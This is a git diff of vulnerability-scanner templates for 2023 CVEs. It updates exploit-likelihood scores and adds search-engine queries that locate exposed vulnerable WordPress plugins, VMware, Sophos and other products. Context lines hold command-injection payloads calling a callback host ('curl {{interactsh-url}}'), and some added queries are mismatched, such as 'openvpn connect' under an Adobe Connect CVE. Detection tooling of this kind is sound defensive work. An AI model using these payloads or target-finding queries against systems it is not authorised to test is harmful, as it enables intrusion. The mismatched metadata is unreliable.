+19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0514 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29003 + epss-score: 0.0011 + epss-percentile: 0.44066 cpe: cpe:2.3:a:membership_database_project:membership_database:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml index 526013cd9d..bb322b34f6 100644 --- a/http/cves/2023/CVE-2023-0527.yaml +++ b/http/cves/2023/CVE-2023-0527.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0527 cwe-id: CWE-79 - epss-score: 0.00228 - epss-percentile: 0.6097 + epss-score: 0.0047 + epss-percentile: 0.75559 cpe: cpe:2.3:a:online_security_guards_hiring_system_project:online_security_guards_hiring_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0552.yaml b/http/cves/2023/CVE-2023-0552.yaml index ac4799a04d..b8a8f23572 100644 --- a/http/cves/2023/CVE-2023-0552.yaml +++ b/http/cves/2023/CVE-2023-0552.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-0552 cwe-id: CWE-601 epss-score: 0.00092 - epss-percentile: 0.37956 + epss-percentile: 0.39168 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml index 64a16cf314..db415f56ad 100644 --- a/http/cves/2023/CVE-2023-0562.yaml +++ b/http/cves/2023/CVE-2023-0562.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-0562 cwe-id: CWE-89 epss-score: 0.02218 - epss-percentile: 0.89242 + epss-percentile: 0.89478 cpe: cpe:2.3:a:phpgurukul:bank_locker_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0600.yaml b/http/cves/2023/CVE-2023-0600.yaml index 5cf087ab03..47c6487754 100644 --- a/http/cves/2023/CVE-2023-0600.yaml +++ b/http/cves/2023/CVE-2023-0600.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-0600 cwe-id: CWE-89 - epss-score: 0.02396 - epss-percentile: 0.89644 + epss-score: 0.04071 + epss-percentile: 0.92114 cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +25,9 @@ info: vendor: plugins-market product: wp_visitor_statistics framework: wordpress + shodan-query: http.html:"wp-stats-manager" fofa-query: body="wp-stats-manager" + google-query: inurl:"/wp-content/plugins/wp-stats-manager" public-www: /wp-content/plugins/wp-stats-manager/ tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market variables: diff --git a/http/cves/2023/CVE-2023-0602.yaml b/http/cves/2023/CVE-2023-0602.yaml index e53dffbe2e..b4d0cd6150 100644 --- a/http/cves/2023/CVE-2023-0602.yaml +++ b/http/cves/2023/CVE-2023-0602.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0602 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26204 + epss-score: 0.00071 + epss-percentile: 0.30429 cpe: cpe:2.3:a:johnniejodelljr:twittee_text_tweet:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index 2dfa76c78a..c9a9a6e5fd 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-0630 cwe-id: CWE-89 - epss-score: 0.05275 - epss-percentile: 0.92293 + epss-score: 0.09092 + epss-percentile: 0.94617 cpe: cpe:2.3:a:wp-slimstat:slimstat_analytics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index 5cfa80b391..c12d836bf2 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-0669 cwe-id: CWE-502 - epss-score: 0.96954 - epss-percentile: 0.99709 + epss-score: 0.96969 + epss-percentile: 0.99729 cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: fortra product: goanywhere_managed_file_transfer shodan-query: http.favicon.hash:1484947000 + fofa-query: app="goanywhere-mft" + zoomeye-query: app:"fortra goanywhere-mft" tags: cve2023,cve,rce,goanywhere,oast,kev,fortra http: diff --git a/http/cves/2023/CVE-2023-0678.yaml b/http/cves/2023/CVE-2023-0678.yaml index 492f3fd699..a3ecfa1573 100644 --- a/http/cves/2023/CVE-2023-0678.yaml +++ b/http/cves/2023/CVE-2023-0678.yaml @@ -13,11 +13,14 @@ info: cvss-score: 5.3 cve-id: CVE-2023-0678 cwe-id: CWE-862 + epss-score: 0.02274 + epss-percentile: 0.8962 cpe: cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:* metadata: vendor: phpipam product: phpipam shodan-query: html:"phpIPAM IP address management" + fofa-query: body="phpipam ip address management" tags: cve,cve2023,php,phpipam,unauth http: diff --git a/http/cves/2023/CVE-2023-0900.yaml b/http/cves/2023/CVE-2023-0900.yaml index 70a8fa58fe..067525648f 100644 --- a/http/cves/2023/CVE-2023-0900.yaml +++ b/http/cves/2023/CVE-2023-0900.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-0900 cwe-id: CWE-89 - epss-score: 0.00947 - epss-percentile: 0.82798 + epss-score: 0.01291 + epss-percentile: 0.85797 cpe: cpe:2.3:a:wpdevart:pricing_table_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: wpdevart product: pricing_table_builder framework: wordpress + shodan-query: http.html:wp-content/plugins/ap-pricing-tables-lite + fofa-query: body=wp-content/plugins/ap-pricing-tables-lite publicwww-query: "wp-content/plugins/ap-pricing-tables-lite" tags: cve2023,cve,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml index e882c0a3ab..2022d1e92d 100644 --- a/http/cves/2023/CVE-2023-0942.yaml +++ b/http/cves/2023/CVE-2023-0942.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0942 cwe-id: CWE-79 - epss-score: 0.0049 - epss-percentile: 0.7561 + epss-score: 0.00445 + epss-percentile: 0.74926 cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0947.yaml b/http/cves/2023/CVE-2023-0947.yaml index 69843c26b2..1562c76f9c 100644 --- a/http/cves/2023/CVE-2023-0947.yaml +++ b/http/cves/2023/CVE-2023-0947.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-0947 cwe-id: CWE-22 - epss-score: 0.0114 - epss-percentile: 0.84427 + epss-score: 0.01537 + epss-percentile: 0.87078 cpe: cpe:2.3:a:flatpress:flatpress:*:*:*:*:*:*:*:* metadata: verified: true @@ -24,6 +24,7 @@ info: vendor: flatpress product: flatpress shodan-query: http.favicon.hash:-1189292869 + fofa-query: body="flatpress" tags: cve,cve2023,huntr,lfi,flatpress,listing http: diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml index 39f153eda8..1066b76c09 100644 --- a/http/cves/2023/CVE-2023-0948.yaml +++ b/http/cves/2023/CVE-2023-0948.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0948 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29003 + epss-score: 0.00085 + epss-percentile: 0.36042 cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml index 16ff8ebd50..f011262b94 100644 --- a/http/cves/2023/CVE-2023-0968.yaml +++ b/http/cves/2023/CVE-2023-0968.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0968 cwe-id: CWE-79 - epss-score: 0.00229 - epss-percentile: 0.61047 + epss-score: 0.00262 + epss-percentile: 0.65937 cpe: cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml index 9acbdeec07..ba432b2d8a 100644 --- a/http/cves/2023/CVE-2023-1020.yaml +++ b/http/cves/2023/CVE-2023-1020.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1020 cwe-id: CWE-89 - epss-score: 0.05497 - epss-percentile: 0.93034 + epss-score: 0.04365 + epss-percentile: 0.92346 cpe: cpe:2.3:a:wp_live_chat_shoutbox_project:wp_live_chat_shoutbox:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml index 9a7d4ce305..5308f6b506 100644 --- a/http/cves/2023/CVE-2023-1080.yaml +++ b/http/cves/2023/CVE-2023-1080.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1080 cwe-id: CWE-79 - epss-score: 0.0025 - epss-percentile: 0.64332 + epss-score: 0.00262 + epss-percentile: 0.65937 cpe: cpe:2.3:a:gnpublisher:gn_publisher:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index dd02c9198b..6030f84805 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1177 cwe-id: CWE-29,CWE-22 - epss-score: 0.02668 - epss-percentile: 0.89327 + epss-score: 0.03032 + epss-percentile: 0.9095 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" + fofa-query: title="mlflow" + google-query: intitle:"mlflow" tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects http: diff --git a/http/cves/2023/CVE-2023-1263.yaml b/http/cves/2023/CVE-2023-1263.yaml index 3ff851d678..25f19d2e58 100644 --- a/http/cves/2023/CVE-2023-1263.yaml +++ b/http/cves/2023/CVE-2023-1263.yaml @@ -27,6 +27,8 @@ info: vendor: niteothemes product: coming_soon_\&_maintenance framework: wordpress + shodan-query: http.html:/wp-content/plugins/cmp-coming-soon-maintenance/ + fofa-query: body=/wp-content/plugins/cmp-coming-soon-maintenance/ publicwww-query: "/wp-content/plugins/cmp-coming-soon-maintenance/" tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth,niteothemes diff --git a/http/cves/2023/CVE-2023-1362.yaml b/http/cves/2023/CVE-2023-1362.yaml index d50e1cf238..e7c3986772 100644 --- a/http/cves/2023/CVE-2023-1362.yaml +++ b/http/cves/2023/CVE-2023-1362.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1362 cwe-id: CWE-1021 - epss-score: 0.00421 - epss-percentile: 0.71594 + epss-score: 0.00134 + epss-percentile: 0.48533 cpe: cpe:2.3:a:bumsys_project:bumsys:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1408.yaml b/http/cves/2023/CVE-2023-1408.yaml index 1bef666e4f..5b16ee7d47 100644 --- a/http/cves/2023/CVE-2023-1408.yaml +++ b/http/cves/2023/CVE-2023-1408.yaml @@ -24,6 +24,8 @@ info: vendor: video_list_manager_project product: video_list_manager framework: wordpress + shodan-query: http.html:/wp-content/plugins/video-list-manager/ + fofa-query: body=/wp-content/plugins/video-list-manager/ publicwww-query: /wp-content/plugins/video-list-manager/ tags: cve,cve2023,wpscan,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml index 475f7f3a27..13e02aa8e0 100644 --- a/http/cves/2023/CVE-2023-1454.yaml +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -30,6 +30,7 @@ info: vendor: jeecg product: jeecg-boot shodan-query: http.favicon.hash:1380908726 + fofa-query: icon_hash=1380908726 tags: cve2023,cve,jeecg,sqli http: diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index ea5d2f901e..85951132a0 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2023-1496 cwe-id: CWE-79 - epss-score: 0.00085 - epss-percentile: 0.34963 + epss-score: 0.00091 + epss-percentile: 0.39059 cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml index 9197a040a0..1c2ba9143e 100644 --- a/http/cves/2023/CVE-2023-1546.yaml +++ b/http/cves/2023/CVE-2023-1546.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1546 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29221 + epss-score: 0.00087 + epss-percentile: 0.36792 cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index b2c83a3a55..c619736526 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1671 cwe-id: CWE-77 - epss-score: 0.96156 - epss-percentile: 0.99469 + epss-score: 0.96909 + epss-percentile: 0.99711 cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:* metadata: verified: true @@ -31,6 +31,7 @@ info: product: web_appliance shodan-query: title:"Sophos Web Appliance" fofa-query: title="Sophos Web Appliance" + google-query: intitle:"sophos web appliance" tags: cve2023,cve,packetstorm,rce,sophos,oast,kev http: diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index 905690f7d5..01496b488e 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -21,14 +21,15 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1698 cwe-id: CWE-78 - epss-score: 0.55051 - epss-percentile: 0.97591 + epss-score: 0.90792 + epss-percentile: 0.98828 cpe: cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wago product: compact_controller_100_firmware shodan-query: html:"/wbm/" html:"wago" + fofa-query: body="/wbm/" html:"wago" tags: cve2023,cve,wago,rce http: diff --git a/http/cves/2023/CVE-2023-1719.yaml b/http/cves/2023/CVE-2023-1719.yaml index 7dff6c4314..f46619f25a 100644 --- a/http/cves/2023/CVE-2023-1719.yaml +++ b/http/cves/2023/CVE-2023-1719.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1719 cwe-id: CWE-665 - epss-score: 0.02807 - epss-percentile: 0.90415 + epss-score: 0.02754 + epss-percentile: 0.90563 cpe: cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:* metadata: verified: true @@ -24,6 +24,7 @@ info: vendor: bitrix24 product: bitrix24 shodan-query: html:"/bitrix/" + fofa-query: body="/bitrix/" tags: cve2023,cve,bitrix,xss,bitrix24 http: diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index cdb9c8fcc3..f48e1c9796 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1730 cwe-id: CWE-89 - epss-score: 0.05497 - epss-percentile: 0.93034 + epss-score: 0.04365 + epss-percentile: 0.92346 cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-1780.yaml b/http/cves/2023/CVE-2023-1780.yaml index f57c2fb70a..588fb35ccd 100644 --- a/http/cves/2023/CVE-2023-1780.yaml +++ b/http/cves/2023/CVE-2023-1780.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-1780 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.2903 + epss-percentile: 0.30482 cpe: cpe:2.3:a:codeermeneer:companion_sitemap_generator:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: codeermeneer product: companion_sitemap_generator framework: wordpress + shodan-query: http.html:/wp-content/plugins/companion-sitemap-generator/ + fofa-query: body=/wp-content/plugins/companion-sitemap-generator/ publicwww-query: "/wp-content/plugins/companion-sitemap-generator/" tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated,codeermeneer diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index 074ffba78d..fa2ae0923a 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -28,6 +28,9 @@ info: vendor: ninjaforms product: ninja_forms framework: wordpress + shodan-query: http.html:/wp-content/plugins/ninja-forms/ + fofa-query: body=/wp-content/plugins/ninja-forms/ + publicwww-query: /wp-content/plugins/ninja-forms/ tags: cve2023,cve,wpscan,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss,ninjaforms http: diff --git a/http/cves/2023/CVE-2023-1880.yaml b/http/cves/2023/CVE-2023-1880.yaml index f4b580719f..7fb02e0450 100644 --- a/http/cves/2023/CVE-2023-1880.yaml +++ b/http/cves/2023/CVE-2023-1880.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1880 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.3203 + epss-score: 0.00109 + epss-percentile: 0.43829 cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,7 @@ info: vendor: phpmyfaq product: phpmyfaq shodan-query: http.html:"phpmyfaq" + fofa-query: body="phpmyfaq" tags: cve2023,cve,huntr,xss,phpmyfaq http: diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml index c1dba8bb95..0f60b833ad 100644 --- a/http/cves/2023/CVE-2023-1890.yaml +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1890 cwe-id: CWE-79 - epss-score: 0.00203 - epss-percentile: 0.57653 + epss-score: 0.00388 + epss-percentile: 0.73155 cpe: cpe:2.3:a:pauple:tablesome:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1892.yaml b/http/cves/2023/CVE-2023-1892.yaml index 3f5115caac..b645cbf988 100644 --- a/http/cves/2023/CVE-2023-1892.yaml +++ b/http/cves/2023/CVE-2023-1892.yaml @@ -3,7 +3,7 @@ id: CVE-2023-1892 info: name: Sidekiq < 7.0.8 - Cross-Site Scripting author: ritikchaddha,princechaddha - severity: high + severity: critical description: | An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system. reference: @@ -11,18 +11,21 @@ info: - https://github.com/sidekiq/sidekiq/commit/458fdf74176a9881478c48dc5cf0269107b22214 - https://nvd.nist.gov/vuln/detail/CVE-2023-1892 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L - cvss-score: 8.3 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H + cvss-score: 9.6 cve-id: CVE-2023-1892 cwe-id: CWE-79 + epss-score: 0.02595 + epss-percentile: 0.90273 cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:* metadata: max-request: 4 vendor: contribsys product: sidekiq + shodan-query: http.title:"sidekiq" fofa-query: title="Sidekiq" + google-query: intitle:"sidekiq" tags: cve,cve2023,sidekiq,contribsys,xss - flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index 53ca70e617..abb4f85238 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-20073 cwe-id: CWE-434 - epss-score: 0.38542 - epss-percentile: 0.97132 + epss-score: 0.37606 + epss-percentile: 0.972 cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2009.yaml b/http/cves/2023/CVE-2023-2009.yaml index 4783e1fe8b..c026ccc8b8 100644 --- a/http/cves/2023/CVE-2023-2009.yaml +++ b/http/cves/2023/CVE-2023-2009.yaml @@ -15,8 +15,8 @@ info: cvss-score: 4.8 cve-id: CVE-2023-2009 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.3232 + epss-score: 0.00099 + epss-percentile: 0.41053 cpe: cpe:2.3:a:pretty_url_project:pretty_url:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml index 1f3d57af08..13fa0f3d0d 100644 --- a/http/cves/2023/CVE-2023-2023.yaml +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2023 cwe-id: CWE-79 - epss-score: 0.00374 - epss-percentile: 0.722 + epss-score: 0.00302 + epss-percentile: 0.69552 cpe: cpe:2.3:a:kunalnagar:custom_404_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml index df356bf630..d0b1f9cc3e 100644 --- a/http/cves/2023/CVE-2023-2059.yaml +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -23,8 +23,8 @@ info: max-request: 1 vendor: dedecms product: dedecms - fofa-query: app="DedeCMS" shodan-query: http.html:"dedecms" + fofa-query: app="DedeCMS" tags: cve,cve2023,dedecms,lfi http: diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index 98345d1968..8c6a99bf46 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-20864 cwe-id: CWE-502 - epss-score: 0.29094 - epss-percentile: 0.96766 + epss-score: 0.25579 + epss-percentile: 0.96694 cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: vmware product: aria_operations_for_logs shodan-query: title:"vRealize Log Insight" + fofa-query: title="vrealize log insight" + google-query: intitle:"vrealize log insight" tags: cve2023,cve,vmware,aria,rce,oast http: diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index 5c4d6d49fd..ac840d783e 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-20887 cwe-id: CWE-77 - epss-score: 0.96408 - epss-percentile: 0.99538 + epss-score: 0.9635 + epss-percentile: 0.99552 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true @@ -32,6 +32,7 @@ info: product: vrealize_network_insight shodan-query: title:"VMware vRealize Network Insight" fofa-query: title="VMware vRealize Network Insight" + google-query: intitle:"vmware aria operations" tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev variables: cmd: "curl {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index 861f3de03f..9266fed72d 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-20888 cwe-id: CWE-502 - epss-score: 0.35911 - epss-percentile: 0.96766 + epss-score: 0.21995 + epss-percentile: 0.96459 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: vendor: vmware product: vrealize_network_insight shodan-query: title:"VMware Aria Operations" + fofa-query: title="vmware vrealize network insight" + google-query: intitle:"vmware aria operations" tags: cve2023,cve,vmware,aria,rce,authenticated,oast http: diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index 03cddd74fc..979a90e51f 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-20889 cwe-id: CWE-77 - epss-score: 0.09004 - epss-percentile: 0.94043 + epss-score: 0.37918 + epss-percentile: 0.9721 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: vmware product: vrealize_network_insight shodan-query: title:"VMware Aria Operations" + fofa-query: title="vmware vrealize network insight" + google-query: intitle:"vmware aria operations" tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive variables: payload: location='http://{{interactsh-url}}' diff --git a/http/cves/2023/CVE-2023-2122.yaml b/http/cves/2023/CVE-2023-2122.yaml index 3ef490f294..bfeaa51bfe 100644 --- a/http/cves/2023/CVE-2023-2122.yaml +++ b/http/cves/2023/CVE-2023-2122.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2122 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26189 + epss-score: 0.00071 + epss-percentile: 0.30429 cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index ccc03dcaa9..0e5d746ec9 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2130 cwe-id: CWE-89 - epss-score: 0.01554 - epss-percentile: 0.85779 + epss-score: 0.02537 + epss-percentile: 0.9017 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index 3731dd9ca1..1542ee4351 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-2178 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.3232 + epss-percentile: 0.33655 cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22232.yaml b/http/cves/2023/CVE-2023-22232.yaml index 06d086c21f..f6a39ea7ba 100644 --- a/http/cves/2023/CVE-2023-22232.yaml +++ b/http/cves/2023/CVE-2023-22232.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-22232 cwe-id: CWE-284,NVD-CWE-noinfo - epss-score: 0.13033 - epss-percentile: 0.95385 + epss-score: 0.12731 + epss-percentile: 0.95463 cpe: cpe:2.3:a:adobe:connect:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: adobe product: connect shodan-query: title:"Adobe Connect" + fofa-query: title="openvpn connect" + google-query: intitle:"openvpn connect" tags: packetstorm,cve2023,cve,adobe,lfd,download http: diff --git a/http/cves/2023/CVE-2023-2224.yaml b/http/cves/2023/CVE-2023-2224.yaml index c9390d770b..35dfc7eedd 100644 --- a/http/cves/2023/CVE-2023-2224.yaml +++ b/http/cves/2023/CVE-2023-2224.yaml @@ -15,8 +15,8 @@ info: cvss-score: 4.8 cve-id: CVE-2023-2224 cwe-id: CWE-79 - epss-score: 0.00102 - epss-percentile: 0.41348 + epss-score: 0.00101 + epss-percentile: 0.41469 cpe: cpe:2.3:a:10web:seo:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2227.yaml b/http/cves/2023/CVE-2023-2227.yaml index 827e860014..de72d1556a 100644 --- a/http/cves/2023/CVE-2023-2227.yaml +++ 